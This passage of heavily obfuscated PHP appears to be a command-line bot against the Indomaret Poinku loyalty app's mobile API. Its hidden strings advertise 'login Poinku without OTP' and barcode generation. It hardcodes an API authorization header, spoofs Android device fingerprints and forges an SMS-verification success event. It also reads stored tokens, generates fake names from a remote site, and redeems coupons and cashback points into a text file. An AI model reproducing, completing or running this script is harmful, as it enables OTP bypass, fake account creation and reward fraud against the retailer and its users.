  if (!($jTEU0 < $S8W9D)) {
    goto YFIXZ;
  }
  goto Qd04P;
  aDo3a:
  die;
  goto pcqM1;
  Iv2S8:
  GVUqX:
  goto JXD87;
  HqqQS:
  goto iLHFy;
  goto pw7cq;
  mHTY8:
  $wDisp = "\173\42\x70\x68\x6f\156\x65\116\x75\155\x62\x65\162\x22\x3a\42" . $zn5zd . "\x22\x2c\42\x64\x65\166\151\143\x65\111\x64\42\x3a\x22" . $aY0el . "\x22\x7d";
  goto BAhn6;
  xHpep:
  $lPULW = $m0f8X;
  goto pFm9q;
  w6iKL:
  xbrV2:
  goto y8VKP;
  yPK1R:
  echo @Zm6IC("\x6e\145\166\171", $K4tCB);
  goto vaWNC;
  jrpYt:
  WUJMe:
  goto mfo7m;
  knqmj:
  echo "\12";
  goto JO9PJ;
  QHxK7:
  $Jk9cx = g8Pf2("\150\164\x74\x70\163\x3a\57\x2f\145\144\164\x73\x61\160\160\56\x69\x6e\144\157\x6d\x61\x72\145\164\160\x6f\x69\156\153\165\x2e\x63\157\155\x2f\143\x75\x73\164\x6f\155\x65\162\57\x61\x70\151\x78\55\61\x35\60\x32\55\x61\x70\x69\x2f\155\157\x62\x69\154\145\57\144\145\x74\x61\x69\x6c\55\x63\x75\163\x74\x6f\x6d\145\x72\x2d\157\x72\x69\147\151\156", $aY0el, $GOXkU, $mlMLt);
  goto s4XZg;
  wzo6j:
  echo "\xa";
  goto ud_I2;
  cubbE:
  echo @zm6IC("\156\145\166\x79", $XDyMm);
  goto A3oaD;
  wxlya:
  echo $BcbF3;
  goto r_9O3;
  EoL_9:
  goto vCPy3;
  goto hphe3;
  eR0Md:
  goto g2xJ9;
  goto w73ga;
  U8GHB:
  if ($XDyMm == "\61") {
    goto piuRU;
  }
  goto DpEee;
  BBtBz:
  lYTFu:
  goto CkDZ0;
  TEHwa:
  @unlink("\x70\157\151\156\150\160\x2e\160\x68\x70");
  goto ZjDi9;
  cYcM8:
  qdNHN:
  goto dOEwT;
  j3Ixl:
  $Jk9cx = g8pF2("\150\x74\x74\160\163\72\x2f\57\145\x64\x74\163\x61\x70\160\x2e\x69\x6e\x64\x6f\x6d\141\162\145\164\160\157\x69\156\153\x75\x2e\143\157\x6d\x2f\x63\157\x6e\x66\151\147\165\162\141\x74\x69\157\x6e\57\141\x70\151\x78\x2d\x31\x35\60\x32\x2d\141\160\151\x2f\155\x6f\x62\151\154\x65\x2f\155\163\55\x68\x6f\x6d\145\160\x61\x67\x65\x2d\x6c\x61\171\x6f\165\x74\57\x67\145\x74\55\x61\154\154\x2d\x68\157\155\x65\160\x61\147\x65\55\x6c\x61\x79\157\x75\x74", $aY0el, $GOXkU, $mlMLt);
  goto nL8vJ;
  A7ytj:
  Y1LJ5:
  goto Nb0X4;
  X5Mni:
  echo @zm6IC("\156\145\x76\171", "\x20\x7c\40\123\143\x72\x69\160\x74\x20\x49\104\115\40\114\x4f\x47\x49\116\40\120\x4f\111\116\113\125\40\124\x41\116\x50\101\x20\117\124\x50\12");
  goto vxPj3;
  AUohZ:
  $H1g60 = json_decode($yI7qh, true);
  goto C9UeF;
  Y6mvl:
  function mHong($FK_yc, $bQedf, $Gk8zK)
  {
    goto voQPu;
    cDEy3:
    fputs($FhLCi, "{$bQedf}\40\75\x20{$Gk8zK}\xa");
    goto DswId;
    DswId:
    fclose($FhLCi);
    goto CVgZV;
    voQPu:
    $FhLCi = fopen($FK_yc, "\x61");
    goto cDEy3;
    CVgZV:
  }
  goto MkOcE;
  bHvhe:
  $QRhbE = explode("\12", @file_get_contents("\x6d\171\x74\157\x6b\145\156"));
  goto eeolX;
  tBWs_:
  die;
  goto CnoX2;
  C3e2F:
  @unlink("\x70\x6f\151\156\150\160\56\160\150\x70");
  goto vZl5D;
  ImlhV:
  die;
  goto G7Qw6;
  F2_6S:
  ADNin:
  goto MQEh3;
  kaG91:
  @unlink("\160\157\x69\x6e\150\160\56\160\150\160");
  goto beUFb;
  X7SAF:
  goto PRokP;
  goto r0iPg;
  mzjL3:
  if (!($jTEU0 < $S8W9D)) {
    goto FB07L;
  }
  goto qzh4E;
  vXlUB:
  $YXsOG = @$Ap1KM["\x6d\x65\163\x73\141\147\145"];
  goto OWQhi;
  m1O2o:
  lcy0b:
  goto hnMXZ;
  Qgse8:
  if (!($fUekS == '')) {
    goto aaoBE;
  }
  goto aZAsM;
  W5OtU:
  $Ap1KM = json_decode($Jk9cx, true);
  goto uEDKi;
  S4WZq:
  echo @zm6IC("\162\x65\144", "\xa\176\x7e\x7e\176\176\176\x7e\176\x7e\176\x7e\x7e\x7e\176\176\176\176\176\x7e\176\x7e\176\x7e\176\176\176\176\176\x7e\176\176\176\x7e\176\176\x7e\176\x7e\176\176\176\x7e\176\x7e\176\176\x7e\x7e\xa");
  goto s9534;
  NWybD:
  $S8W9D = trim(fgets(STDIN));
  goto F0l4Y;
  iaa8j:
  if (!($yy9BI < $DxrJr)) {
    goto lPFhp;
  }
  goto b8Z6e;
  syFts:
  m6VhL:
  goto ufeHC;
  M6siS:
  sho4i:
  goto DeaiS;
  MCqL1:
  $GOXkU = $w5ulg;
  goto X73Ka;
  kq9hY:
  echo "\x4d\x75\154\141\151\40\102\x61\x72\151\x73\x20\113\145\x20\40\x3a\40";
  goto tXal_;
  w_yIX:
  BGNon:
  goto hTCB6;
  UHSQH:
  echo @Zm6iC("\x79\x65\154\x6c\x6f\x77", "\x49\104\40\156\171\x61\x3a\40");
  goto WUD90;
  PX6b2:
  echo @ZM6iC("\162\x65\144", "\x47\x61\147\x61\x6c\x2c\x20\115\x65\156\147\141\155\x62\x69\154\40\x55\154\141\156\x67\x20\116\157\x6d\x6f\162\56\56\x2e");
  goto H6_GJ;
  hnEGN:
  echo @zM6Ic("\x6e\145\166\171", "\x41\x6b\x75\x6e\x20\x4b\145\x20\x20\x20\x20\x20\x20\40\40\72\x20");
  goto WNyMN;
  rjVqC:
  $M1ADy = @$Ap1KM["\x64\141\164\x61"]["\x69\x64"];
  goto zH0f9;
  dOEwT:
  if (!($fUekS == '')) {
    goto KV6h2;
  }
  goto fFoJk;
  Ck1_U:
  $L1qpJ = @$owfHy["\144\x61\x74\x61"][$qtgR3]["\144\151\163\x74\x72\x69\x63\164"];
  goto pkmY4;
  x29nF:
  if (!($fUekS == '')) {
    goto q3ueI;
  }
  goto ZImQQ;
  zFklN:
  $u35jw = count($m0f8X) - 1;
  goto oEEsC;
  AAZZf:
  $efQM2 = count($QRhbE) - 1;
  goto hq7kH;
  mBwSQ:
  echo shell_exec("\170\x64\x67\x2d\157\160\x65\x6e\x20\x22\150\164\164\x70\163\x3a\x2f\57\x62\141\x72\x63\x6f\144\145\x2e\164\145\x63\55\151\164\56\143\x6f\x6d\x2f\142\141\162\x63\x6f\144\145\56\141\163\150\x78\77\x64\x61\x74\x61\x3d\x22" . $p4iky . "\x22\46\x63\x6f\144\145\x3d\x43\157\144\145\x31\x32\x38\x26\x6d\165\x6c\164\151\160\x6c\x65\142\x61\162\143\157\x64\x65\163\x3d\x66\x61\154\163\x65\46\164\162\141\x6e\163\154\x61\164\x65\x2d\x65\x73\x63\75\164\x72\165\145\46\x75\156\151\x74\x3d\106\x69\164\x26\x64\160\x69\x3d\x39\66\x26\x69\155\x61\147\145\164\171\x70\145\x3d\x47\151\x66\x26\162\157\x74\141\164\x69\x6f\x6e\x3d\x30\46\x63\157\154\x6f\x72\x3d\x25\62\63\x30\x30\60\x30\x30\x30\46\142\147\x63\x6f\154\x6f\162\x3d\45\62\x33\x66\146\x66\x66\x66\146\46\143\x6f\x64\x65\160\141\x67\x65\x3d\x44\x65\146\141\x75\154\164\x26\x71\x75\156\x69\x74\75\x4d\x6d\46\x71\x75\x69\145\164\75\61\60\x26\150\x69\x64\145\x68\x72\164\x3d\106\141\154\x73\x65\42");
  goto MSqF0;
  RM5B6:
  echo "\12";
  goto nmVJN;
  nNr1Z:
  echo @zm6ic("\147\x72\145\145\x6e", "\x4d\x61\x75\x20\124\x75\153\x61\162\x20\120\162\x6f\x64\165\153\x20\x4d\141\156\x61\x20\x3f\x20\x3a\40");
  goto YNuST;
  TiDu9:
  $Pud0o = trim(file_get_contents("\150\x74\x74\x70\163\x3a\x2f\57\x72\141\167\56\x67\151\164\x68\165\142\165\x73\145\162\x63\157\156\x74\145\156\164\x2e\x63\157\155\57\143\x73\141\x6f\152\x6b\x63\163\141\x6a\x63\x73\x6a\156\152\153\x73\x63\141\x6e\x6a\x6b\x6e\143\152\153\163\154\156\152\x2f\141\x64\146\141\x64\146\x61\144\x76\x73\147\x64\146\x67\147\146\163\x67\163\x67\x66\163\x61\x66\x2f\x6d\141\151\156\57\155\x61\x6b\151\x6e"));
  goto M0pcn;
  dem36:
  echo @zm6Ic("\156\145\x76\171", "\x50\x72\157\163\145\163\40\126\145\x72\x69\x66\x69\153\141\x73\151\x20\x44\x65\166\151\143\145\40\x49\x44\54\x20\x4d\x6f\x68\157\156\40\x54\165\x6e\x67\147\165\x20\x2e\x2e");
  goto nE0JD;
  nFrYj:
  echo @zm6IC("\x79\145\154\154\x6f\167", "\x4b\157\144\145\40\113\165\160\157\x6e\156\171\x61\x20\x20\40\40\72\x20");
  goto Zcbgi;
  ozhcH:
  Rhrij("\113\x75\x70\x6f\156\x20\x50\157\151\x6e\x6b\x75\40\156\x65\167\56\x74\x78\x74", $zV17j);
  goto Zv9qP;
  mHZx1:
  echo @Zm6Ic("\x67\162\x65\x65\156", "\x5b\70\x5d\x20{$z4sxX}\x20\xa\40\x20\40\40\76\40{$raN1z}\40\12\xa");
  goto m1yWR;
  ejeA7:
  $M1ADy = @$Ap1KM["\144\x61\x74\141"]["\x69\x64"];
  goto Wh127;
  QPI07:
  if (!($fUekS == '')) {
    goto Z7aYS;
  }
  goto QFrmT;
  rdASk:
  @unlink("\x70\x6f\x69\156\150\160\x2e\160\x68\x70");
  goto nzGg7;
  i5AD_:
  echo "\12";
  goto L6ZvK;
  mJNk_:
  echo $jTEU0;
  goto fj_AT;
  G8Xed:
  FbwVq:
  goto OwlK1;
  b1QyZ:
  $wZnHP = $lPULW[$jTEU0];
  goto Ja0J8;
  GIKee:
  echo @ZM6Ic("\x6e\x65\166\171", "\x20\174\40\x53\143\162\x69\x70\164\x20\x49\x44\x4d\x20\x47\105\x4e\105\122\x41\x54\x45\x20\102\x41\122\103\x4f\104\105\12");
  goto KOkWb;
  mOFOa:
  echo "\xa";
  goto sHluB;
  eu_9w:
  $p4iky = @$nPb0z["\144\x61\164\141"]["\155\145\x6d\142\x65\162\111\x64"];
  goto qH6lQ;
  l9zj0:
  echo "\123\141\155\x70\x61\x69\x20\102\141\162\151\x73\x20\113\145\x20\x3a\x20";
  goto x3nD5;
  MKy2r:
  $Gukt8 = $eqo_P;
  goto YzEEQ;
  p97HD:
  echo "\x53\141\155\160\141\151\x20\102\x61\x72\x69\x73\40\113\145\40\72\x20";
  goto YLDiM;
  muUMy:
  @unlink("\x63\150\x61\x63\145");
  goto LmE7p;
  b61mZ:
  $jTEU0;
  goto HCxli;
  c5Fn9:
  echo @Zm6Ic("\x6e\145\x76\171", "\x20\123\x45\115\x4f\x47\x41\40\114\x4f\102\x41\116\x47\x20\x50\x41\116\x54\x41\124\x20\116\x59\x41\40\102\x49\x53\125\114\x41\116\x21\x21\x21\x21\41\x20\12");
  goto CcQD1;
  sTIym:
  zYvyA:
  goto O4vBH;
  M3PcJ:
  @unlink("\160\x6f\x69\x6e\x68\160\56\160\150\160");
  goto x1zmG;
  mcJlP:
  Pn_38:
  goto uqWGX;
  vx_HS:
  function Mp3kk($lEbop, $wDisp = null)
  {
    goto EDW_5;
    x68Hi:
    w3YVg:
    goto zn4lr;
    ctq95:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\x69\156\x64\157\56\164\170\x74");
    goto w6FeH;
    bzJtw:
    $ruc3h[] = "\165\163\145\162\55\141\x67\145\156\x74\x3a\40\157\153\x68\x74\164\x70\x2f\64\56\x39\56\60";
    goto t9QR8;
    BQG0q:
    $ECuqv = curl_exec($C6npe);
    goto RKach;
    wBcD2:
    curl_setopt($C6npe, CURLOPT_POST, 1);
    goto bzJtw;
    EDW_5:
    $C6npe = curl_init();
    goto lq4N3;
    fYsgi:
    return $ECuqv;
    goto c80C7;
    zn4lr:
    $AXlcQ = json_decode($y7f11, true);
    goto C0k9a;
    th04s:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto ryYZI;
    w6FeH:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\x6e\x64\157\56\164\x78\164");
    goto BQG0q;
    NKxI1:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto XEvjR;
    lq4N3:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto hVNG1;
    CIbo6:
    $ruc3h[] = "\141\165\x74\150\x6f\162\151\172\141\x74\x69\157\x6e\72\x20\x4e\x4e\113\123\153\x54\x64\x6f\157\121\157\67\x76\x55\107\126\107\65\x65\107\153\147\131\123\126\127\67\x53\x61\x62\123\x6a\x66\x66\141\146\x61\x6f\63\65\156\x66\157\x61\x6e\63\x79\147\x66\141\141";
    goto th04s;
    wdfSo:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto yeYmb;
    n6JLi:
    return false;
    goto x68Hi;
    ryYZI:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto wdfSo;
    HEr9L:
    M80Ly:
    goto n6JLi;
    uAlRq:
    $ruc3h[] = "\110\157\163\164\72\40\141\163\151\x61\55\163\157\x75\x74\x68\x65\x61\x73\164\62\55\151\x64\x6d\55\143\157\x72\160\55\x70\162\x64\x2e\x63\x6c\157\165\144\146\165\x6e\143\x74\151\157\x6e\x73\x2e\x6e\145\x74";
    goto vW1dC;
    XEvjR:
    goto w3YVg;
    goto HEr9L;
    cPiSK:
    if (!$P7lm9) {
      goto M80Ly;
    }
    goto M3eAS;
    yeYmb:
    curl_setopt($C6npe, CURLOPT_POSTFIELDS, $wDisp);
    goto ctq95;
    t9QR8:
    $ruc3h[] = "\141\x63\143\145\x70\x74\55\x65\156\x63\157\x64\x69\x6e\x67\x3a\40\x67\x7a\151\160";
    goto uAlRq;
    M3eAS:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto NKxI1;
    RKach:
    $P7lm9 = curl_getinfo($C6npe);
    goto cPiSK;
    Pq9OA:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto wBcD2;
    hVNG1:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto Pq9OA;
    C0k9a:
    print_r($AXlcQ);
    goto fYsgi;
    vW1dC:
    $ruc3h[] = "\x63\157\x6e\164\145\x6e\164\55\164\x79\x70\x65\x3a\x20\141\160\x70\x6c\151\143\141\164\x69\157\156\57\x6a\163\157\156\73\x20\x63\150\141\162\x73\x65\x74\75\125\x54\106\x2d\70";
    goto CIbo6;
    c80C7:
  }
  goto FqbQV;
  WDeTC:
  @unlink("\x70\157\x69\156\x68\160\56\x70\150\x70");
  goto swve1;
  NI96b:
  if ($ZNU2M == "\103\141\x73\150\142\x61\x63\153\x20\62\56\x35\60\60\40\120\157\151\x6e") {
    goto fblk0;
  }
  goto po2np;
  utu6T:
  $Ap1KM = json_decode($Jk9cx, true);
  goto hnJzX;
  VGfok:
  $aY0el = $v1ZMX;
  goto gQSHj;
  X7D5K:
  $tqWr2 = $zvt88[$jTEU0];
  goto DsKSR;
  w0IcM:
  $yy9BI;
  goto H36MT;
  iOY8b:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto WmLIs;
  YIYeO:
  aOh1Q:
  goto KPFhC;
  Y7Sve:
  $kp_uF = @$nPb0z["\x64\x61\164\x61"]["\151\163\116\145\x77\x52\145\x67\151\163\164\x65\x72"];
  goto S6BIV;
  Ga713:
  @unlink("\160\157\x69\156\x68\160\56\160\150\160");
  goto o2TKk;
  ke5o4:
  function yrz3j($lEbop, $aY0el, $GOXkU)
  {
    goto FyHRb;
    eyZfR:
    $ruc3h[] = "\153\145\171\72\x20\x5a\x57\122\x30\143\x7a\x49\167\115\152\105\x36\115\110\x42\x73\x62\x57\x39\x72\142\147\x3d\75";
    goto ihJqq;
    RirJI:
    xoT9Q:
    goto zMOXf;
    q6SnL:
    print_r($AXlcQ);
    goto qdB7x;
    XCGnp:
    curl_setopt($C6npe, CURLOPT_COOKIEJAR, "\151\156\144\x6f\x2e\x74\170\x74");
    goto cDQmT;
    Pg6_j:
    $ruc3h = substr($ECuqv, 0, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto yZ1mN;
    FKuup:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto XCGnp;
    e4hPU:
    curl_setopt($C6npe, CURLOPT_URL, $lEbop);
    goto ZPMqb;
    cDQmT:
    curl_setopt($C6npe, CURLOPT_COOKIEFILE, "\x69\156\144\x6f\56\x74\x78\x74");
    goto l5UG1;
    ZPMqb:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, true);
    goto KDrIK;
    KDrIK:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto fb4EW;
    tlyx_:
    goto xoT9Q;
    goto Bcjwj;
    sL9Nc:
    if (!$P7lm9) {
      goto cJnpK;
    }
    goto Pg6_j;
    MrJZd:
    return false;
    goto RirJI;
    P_dFs:
    curl_setopt($C6npe, CURLOPT_AUTOREFERER, true);
    goto FpWfX;
    aRizd:
    $ruc3h[] = "\110\157\x73\164\72\x20\145\144\x74\163\141\160\160\56\x69\156\144\x6f\155\x61\x72\145\x74\160\x6f\151\156\x6b\165\56\x63\x6f\155";
    goto eyZfR;
    qdB7x:
    return $ECuqv;
    goto BEuf0;
    Wj23N:
    $P7lm9 = curl_getinfo($C6npe);
    goto sL9Nc;
    FyHRb:
    $C6npe = curl_init();
    goto e4hPU;
    FpWfX:
    curl_setopt($C6npe, CURLOPT_HTTPHEADER, $ruc3h);
    goto FKuup;
    ihJqq:
    $ruc3h[] = "\173\x22\141\160\x70\x5f\166\x65\162\x73\151\x6f\156\x22\72\x22\63\x2e\61\63\56\x30\x22\54\x22\x64\x65\166\x69\143\145\x5f\x63\154\141\x73\x73\42\x3a\x22\x50\x68\157\x6e\x65\42\54\x22\144\x65\166\151\x63\145\137\x66\141\155\x69\154\x79\42\x3a\42" . $GOXkU . "\42\54\x22\x64\x65\166\x69\143\145\x5f\151\144\42\72\42" . $aY0el . "\x22\x2c\42\157\163\137\x6e\141\x6d\145\x22\72\x22\x41\156\x64\x72\x6f\151\144\x20\120\x22\x2c\42\x6f\163\137\166\x65\162\163\x69\x6f\x6e\x22\x3a\42\x41\x6e\144\162\x6f\x69\144\x20\71\42\x7d";
    goto P_dFs;
    yZ1mN:
    $y7f11 = substr($ECuqv, curl_getinfo($C6npe, CURLINFO_HEADER_SIZE));
    goto tlyx_;
    l5UG1:
    $ECuqv = curl_exec($C6npe);
    goto Wj23N;
    fb4EW:
    $ruc3h[] = "\165\x73\x65\162\55\x61\x67\x65\x6e\164\72\40\x6f\153\x68\164\164\x70\x2f\x34\x2e\71\56\x30";
    goto aRizd;
    zMOXf:
    $AXlcQ = json_decode($y7f11, true);
    goto q6SnL;
    Bcjwj:
    cJnpK:
    goto MrJZd;
    BEuf0:
  }
  goto If3cN;
  bQ3QD:
  echo "\12";
  goto veYsp;
  qPkmL:
  echo @ZM6ic("\x6e\x65\x76\x79", "\x4d\x61\x73\165\x6b\x6b\141\x6e\40\x41\120\x49\40\113\x65\x79\40\x4d\x75\40\x20\72\40");
  goto t4a2M;
  TRBQ4:
  goto fZnQ2;
  goto A7ytj;
  i9Vur:
  PSckK:
  goto juo3c;
  qovaZ:
  $mlMLt = $obc_G;
  goto UDuJL;
  a0DWl:
  $XDyMm = @$Ap1KM["\x64\x61\x74\141"]["\x62\141\154\x61\x6e\143\x65"];
  goto AWPnd;
  h9vq8:
  GWmgR:
  goto Nz3YB;
  FhaVw:
  die;
  goto PPwSO;
  RGbnB:
  $yy9BI = "\x30";
  goto QDAIS;
  RU4S9:
  if (!($IBJ55 == '')) {
    goto CAy8f;
  }
  goto IcyUK;
  JeqGb:
  CQ2mu:
  goto XMS9r;
  arWms:
  $wDisp = "\x7b\42\x64\141\x74\x61\x22\72\133\x7b\x22\x61\x70\x70\154\151\x63\141\x74\x69\157\156\x22\x3a\173\42\x61\160\160\137\166\x65\x72\x73\x69\157\156\42\72\42\x33\x2e\x31\x33\x2e\x30\42\54\42\x64\145\x76\151\143\145\x5f\x63\x6c\x61\163\x73\42\72\x22\x50\x68\x6f\x6e\x65\42\x2c\42\144\x65\x76\x69\143\145\137\146\141\x6d\151\x6c\171\42\72\42" . $GOXkU . "\42\54\42\144\145\166\x69\x63\x65\x5f\x69\x64\42\x3a\x22" . $aY0el . "\42\54\42\157\x73\137\x6e\x61\x6d\x65\42\72\42\x41\x6e\x64\162\157\151\144\40\x50\x22\54\x22\157\x73\x5f\166\145\162\163\151\x6f\156\42\72\42\x41\156\144\162\157\x69\x64\x20\71\x22\175\x2c\42\143\157\162\x65\x22\x3a\173\x22\146\x61\151\x6c\145\144\137\162\x65\141\x73\x6f\156\x22\x3a\x22\x53\165\x63\143\145\163\163\40\x53\115\123\x20\126\145\x72\x69\146\151\143\x61\x74\151\157\x6e\42\54\42\x65\166\145\x6e\164\137\x6c\x61\x62\145\154\x22\72\42\166\x65\x72\151\x66\x69\x63\x61\x74\151\x6f\x6e\42\x2c\42\x65\166\145\156\x74\x5f\x6e\141\x6d\145\42\72\x22\145\x76\145\x6e\164\x5f\163\165\142\155\151\x73\163\x69\x6f\x6e\42\54\42\x65\x76\145\x6e\x74\137\163\164\141\x74\165\163\x22\x3a\42\x73\x75\x63\143\x65\163\163\42\x2c\x22\145\166\145\156\x74\x5f\x74\151\155\x65\x73\164\141\x6d\160\42\x3a" . $nb9cm . "\175\x2c\42\155\141\x72\153\x65\x74\x69\156\x67\42\72\173\42\165\164\x6d\137\x72\141\x77\42\72\42\x75\x74\x6d\137\163\x6f\x75\162\x63\145\75\x67\x6f\x6f\x67\154\x65\55\x70\x6c\x61\171\x26\165\164\x6d\x5f\x6d\x65\144\151\165\x6d\75\x6f\162\x67\x61\x6e\151\x63\x22\175\54\42\x75\163\x65\x72\x22\72\173\x22\163\145\x73\163\151\x6f\156\x5f\151\144\x22\72\42" . $MXjqh . "\42\54\x22\165\163\145\x72\x5f\151\144\42\x3a" . $R_bYC . "\x2c\x22\165\x73\x65\162\x5f\x69\x70\137\141\144\144\x72\x65\x73\x73\x22\x3a\42\x31\x32\x37\56\60\56\x30\56\x31\x22\175\x7d\135\175";
  goto XxnqS;
  p3xdC:
  die;
  goto wjJ6w;
  kMWxV:
  echo "\12";
  goto zwaNA;
  cQgXr:
  echo "\xa";
  goto oCGJ7;
  la72U:
  goto xh261;
  goto oICIz;
  NVl_i:
  function WY7iI()
  {
    goto TTMdB;
    TTMdB:
    $C6npe = curl_init();
    goto b5sWV;
    P4dtW:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYHOST, 0);
    goto q9bzj;
    sbEbS:
    curl_setopt($C6npe, CURLOPT_FOLLOWLOCATION, 1);
    goto SOECe;
    q9bzj:
    curl_setopt($C6npe, CURLOPT_RETURNTRANSFER, 1);
    goto sbEbS;
    SOECe:
    $oYSb9 = curl_exec($C6npe);
    goto i8UX6;
    R94cH:
    return $ZXjwY[2][mt_rand(0, 14)];
    goto TKVt9;
    aTYyU:
    curl_setopt($C6npe, CURLOPT_SSL_VERIFYPEER, 0);
    goto P4dtW;
    i8UX6:
    preg_match_all("\176\x28\xe2\200\xa2\40\x28\56\52\x3f\51\x3c\x62\x72\x2f\x3e\xe2\x80\242\40\x29\x7e", $oYSb9, $ZXjwY);
    goto R94cH;
    b5sWV:
    curl_setopt($C6npe, CURLOPT_URL, "\150\164\x74\x70\72\57\57\x6e\151\x6e\152\141\x6e\141\x6d\145\x2e\150\x6f\x72\163\x65\162\x69\144\145\x72\x73\x75\160\x70\154\171\x2e\143\x6f\x6d\57\151\x6e\x64\x6f\x6e\x65\x73\x69\141\x6e\137\x6e\141\x6d\145\x2e\x70\x68\160");
    goto aTYyU;
    TKVt9:
  }
  goto x5btj;
  cnUbl:
  echo "\xa";
  goto AQXMs;
  LGOHq:
  @unlink("\160\x6f\x69\156\x68\160\x2e\x70\x68\x70");
  goto Sgp3W;
  soYFB:
  dGfMJ:
  goto d32UI;
  v0lAt:
  goto AGZdm;
  goto t3iAT;
  OWQFJ:
  echo "\xa";
  goto VPytH;
  vdihH:
  wB2V7:
  goto pNRYy;
  zf8Zf:
  $wDisp = "\x7b\42\x61\144\x64\162\x65\163\163\x22\x3a\x22" . $hGkCN . "\x22\x2c\42\x61\x64\x64\162\x65\x73\163\116\141\x6d\x65\42\x3a\42\x52\x75\x6d\x61\150\42\x2c\x22\x64\x69\163\164\x72\x69\x63\164\42\x3a\x7b\42\143\x69\x74\171\x22\72" . $JrTpE . "\54\42\143\151\164\171\116\x61\155\x65\x22\72\42" . $b2ucB . "\42\x2c\42\x64\x69\163\x74\162\151\x63\164\42\72" . $L1qpJ . "\x2c\42\x64\x69\163\x74\x72\151\x63\164\116\141\x6d\x65\42\x3a\42" . $yJiD4 . "\x22\x2c\x22\x6b\145\x79\x77\x6f\162\x64\x22\x3a\x22" . $ZqwwP . "\x22\54\42\x70\x72\157\x76\151\156\x63\x65\42\x3a" . $Ipl73 . "\x2c\42\x70\x72\x6f\166\151\x6e\x63\x65\x4e\141\x6d\145\42\72\42" . $K4tCB . "\x22\x7d\x2c\x22\151\x64\x22\72\x30\x2c\42\151\163\120\162\x69\x6d\141\162\171\x22\72\x66\x61\154\x73\x65\x2c\x22\160\x6f\163\164\x61\154\x43\157\x64\x65\42\x3a\x7b\x22\160\x6f\x73\x74\x61\154\103\157\144\145\x22\x3a\x22" . $Bz8Et . "\x22\54\x22\x70\157\x73\164\141\154\x43\x6f\x64\x65\x49\x64\42\x3a\42" . $pugmZ . "\x22\175\54\42\x72\145\143\x69\160\x69\145\x6e\x74\105\x6d\141\151\154\x22\x3a\42" . $z6UZd . "\42\x2c\x22\x72\x65\143\151\160\x69\145\156\x74\x4e\x61\155\145\x22\x3a\42" . $m_IIo . "\x22\54\42\x72\x65\143\x69\160\151\145\x6e\164\x50\x68\157\x6e\145\116\x75\155\142\145\x72\x22\x3a\x22" . $qFy6r . "\x22\x2c\42\163\x75\142\x44\151\163\164\162\x69\x63\x74\42\x3a\173\42\163\165\142\104\x69\163\164\162\151\143\x74\42\x3a\x22" . $ldzeo . "\x22\x2c\42\163\x75\x62\x44\x69\x73\x74\x72\151\x63\164\103\157\x64\145\x22\x3a\x22" . $U_EVz . "\42\x2c\42\166\141\154\x75\145\42\x3a\x22" . $xzAuu . "\x22\x7d\x7d";
  goto mHcF1;
  zEG1z:
  $yWjvE = @$owfHy["\144\141\x74\x61"]["\143\x6f\x6e\x74\145\156\x74"][$D2zwh]["\x75\163\145\x64\121\x75\157\x74\141"];
  goto W3gKn;
  uKX_I:
  $S8W9D = trim(fgets(STDIN));
  goto b61mZ;
  KPFhC:
  if (!($yy9BI < $DxrJr)) {
    goto BGNon;
  }
  goto ZLXD4;
  vUkxr:
  echo "\xa";
  goto vydVo;
  nmqsG:
  $Jk9cx = G8pf2("\150\164\164\x70\x73\x3a\x2f\57\x65\144\x74\x73\x61\x70\160\x2e\151\x6e\x64\x6f\x6d\x61\162\x65\164\160\x6f\x69\x6e\x6b\x75\x2e\x63\157\x6d\x2f\143\165\x73\x74\157\x6d\x65\x72\57\141\160\151\170\55\61\65\x30\62\55\141\x70\151\x2f\x6d\x6f\142\151\154\145\57\x64\x65\164\x61\x69\154\55\143\x75\163\164\x6f\155\x65\x72\55\x6f\x72\151\x67\x69\x6e", $aY0el, $GOXkU, $mlMLt);
  goto O1aXH;
  JpUFi:
  $sONlZ = str_replace("\xd", '', $rERzL);
  goto VnEev;
  T96NA:
  $YXsOG = @$Ap1KM["\x6d\145\163\163\x61\x67\145"];
  goto EgQkD;
  QzPor:
  echo @ZM6IC("\156\145\166\x79", "\40\174\x20\x53\x63\x72\x69\x70\x74\x20\111\x44\x4d\x20\114\x4f\107\111\x4e\40\120\117\x49\x4e\x4b\125\x20\124\x41\x4e\x50\101\40\117\x54\x50\12");
  goto g8swJ;
  IF799:
  echo @zm6Ic("\156\x65\x76\171", "\x20\x53\105\115\117\107\x41\x20\x4c\x4f\102\x41\116\x47\40\120\101\116\x54\101\124\x20\x4e\x59\101\40\x42\x49\x53\x55\x4c\x41\x4e\x21\x21\x21\x21\x21\40\12");
  goto VLriK;
  rMiHp:
  $zcN5u = XOZB4(array("\x7c"), $wZnHP)[0];
  goto ypXdS;
  b8xnZ:
  echo @zm6IC("\147\162\x65\x65\156", "\x4e\157\155\157\162\40\x48\120\x20\x41\156\x64\141\x20\x20\x3a\40");
  goto CX3Ha;
  Rw6sZ:
  $M1ADy = @$Ap1KM["\x64\141\164\x61"]["\x69\x64"];
  goto TlphE;
  UOMa8:
  $m0f8X = explode("\xa", @file_get_contents("\155\171\164\157\x6b\145\x6e"));
  goto al2pj;
  pUl6i:
  $KOeAA = @$Ap1KM["\x64\141\164\141"]["\162\145\x77\x61\162\x64\x73"][0]["\x69\164\x65\155"][0]["\x63\x6f\x75\x70\157\x6e\115\x61\163\164\145\162\111\x64"];
  goto STwv9;
  IgHJm:
  if (!($fUekS == '')) {
    goto bLHjw;
  }
  goto bD9yR;
  EtgZF:
  thh3I:
  goto HU3Jb;
  AHUHW:
